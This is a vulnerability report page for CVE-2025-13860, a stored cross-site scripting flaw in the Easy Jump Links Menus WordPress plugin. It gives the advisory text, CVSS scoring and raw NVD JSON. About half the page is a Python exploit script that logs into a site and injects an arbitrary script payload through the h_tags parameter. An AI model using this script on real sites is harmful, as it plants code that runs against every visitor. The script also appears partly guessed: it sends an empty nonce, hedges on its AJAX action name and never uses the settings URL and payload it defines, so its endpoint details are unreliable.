Security Vulnerability Report
中文
CVE-2025-13860 CVSS 6.4 MEDIUM

CVE-2025-13860

Published: 2025-12-05 06:16:09
Last Modified: 2026-04-15 00:35:42

Description

The Easy Jump Links Menus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `h_tags` parameter in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Easy Jump Links Menus <= 1.0.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13860 PoC - Easy Jump Links Menus Stored XSS # Target: WordPress site with Easy Jump Links Menus plugin <= 1.0.0 def exploit_stored_xss(target_url, username, password, xss_payload): """ Exploits CVE-2025-13860 by injecting XSS payload via h_tags parameter Requires Contributor+ level access to WordPress """ session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/" } response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed!") return False print("[+] Login successful!") # Step 2: Find the plugin settings page or AJAX endpoint # The vulnerable parameter is 'h_tags' in the plugin's settings plugin_settings_url = f"{target_url}/wp-admin/admin.php?page=easy-jump-links-menus" # Step 3: Inject XSS payload via h_tags parameter exploit_data = { 'h_tags': xss_payload, 'action': 'save_settings', 'nonce': '' # Need to fetch valid nonce from plugin page } # Alternative: Use AJAX endpoint if available ajax_url = f"{target_url}/wp-admin/admin-ajax.php" ajax_data = { 'action': 'easy_jump_links_save', 'h_tags': xss_payload, 'nonce': '' # Fetch from plugin page } response = session.post(ajax_url, data=ajax_data) if response.status_code == 200: print(f"[+] XSS payload injected: {xss_payload}") print("[+] Payload will execute when any user visits affected pages") return True return False if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <xss_payload>") print("Example: python exploit.py http://target.com admin admin <script>alert(1)</script>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] payload = sys.argv[4] exploit_stored_xss(target, user, pwd, payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13860", "sourceIdentifier": "[email protected]", "published": "2025-12-05T06:16:08.730", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Easy Jump Links Menus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `h_tags` parameter in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/easy-jump-links-menus/tags/1.0.0/easy-jump-links-menus.php#L52", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-jump-links-menus/trunk/easy-jump-links-menus.php#L52", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e3e88dc0-4798-4da8-87cf-4c398acc622c?source=cve", "source": "[email protected]"}]}}